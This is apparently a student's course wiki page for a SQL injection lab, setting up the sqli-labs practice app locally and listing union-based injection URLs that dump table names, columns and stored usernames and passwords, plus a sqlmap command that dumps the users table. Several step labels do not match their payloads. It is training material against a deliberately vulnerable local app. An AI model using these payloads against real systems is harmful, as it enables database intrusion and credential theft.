Lab 9.1: SQLi Review - squatchulator/Tech-Journal GitHub Wiki

Lab 9.1 - SQLi Review

Configure MySQLi

sudo systemctl enable mysqld
sudo systemctl start mysqld
sudo mysql_secure_installation

## Enter root password (I think it can be anything?)
## Enter 'n' for unix_socket authentication, 'y' for the rest.

mkdir -p ~/Documents/SEC-335/Week9
cd ~/Documents/SEC-335/Week9
git clone https://github.com/skyblueee/sqli-labs-php7.git
cd sqli-labs-php7

Add the following to sql-connections/db-creds.inc

<?php
$dbuser ='root';
$dbpass ='<password>'; NOTE: this needs to be the same password you set up MySQL with
$dbname ="security";
$host ='localhost';
$dbname1 ="challenges";
?>
  • Start the application (from the directory we created above: /Documents/SEC-335/Week9/sqli-labs-php7) with php -S 127.0.0.1:8090 -t .
  • Now you should be able to visit 127.0.0.1:8090 via the web browser.
  • Edit the file /Documents/SEC-335/Week9/sqli-labs-php7/Less-1/index.php and add the following:
Beneath "include("../sql-connections/sqli-connect.php");...

error_reporting(E_ALL);
ini_set('display_errors', 1);

Beneath "$row = msqli_fetch_array($result ,MYSQLI_BOTH);...
printf("<br>raw_sql: %s<br>", $sql);
  • Now, start the SQL server back up and navigate to it via the web browser.
  1. Display the Login name and password for arbitrary user
  • 127.0.0.1:8090/Less-1?id=1
  1. Error condition when number of columns are exceeded
  • 127.0.0.1:8090/Less-1?id=-1’ union select 1,2–-+
  1. A Union select that displays your own value for login name and password
  • 127.0.0.1:8090/Less-1/?id=-1' union select 1,user(),database()%20--+
  1. Another union that displays the mysql user and database
  • 127.0.0.1:8090/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
  1. A union that dumps all the tables in the current database
  • http://127.0.0.1:8090/Less-1/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()--+
  1. A union that dumps all the usernames and passwords
  • 127.0.0.1:8090/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users --+
  1. Figure out how to run sqlmap against the vulnerable uri: http://127.0.0.1:8090/Less-1?id=1
  • Run this using Medium Difficulty and Intermediate Enumeration.
  • Figure out how to dump the contents of the users table in the security database.
  • Provide a screenshot showing the results of dumping the user's table.
    • sqlmap -u http://127.0.0.1:8090/Less-1/?id=1 -T users --level 2 --risk 2 --dump
    • Say yes to all prompts
⚠️ **GitHub.com Fallback** ⚠️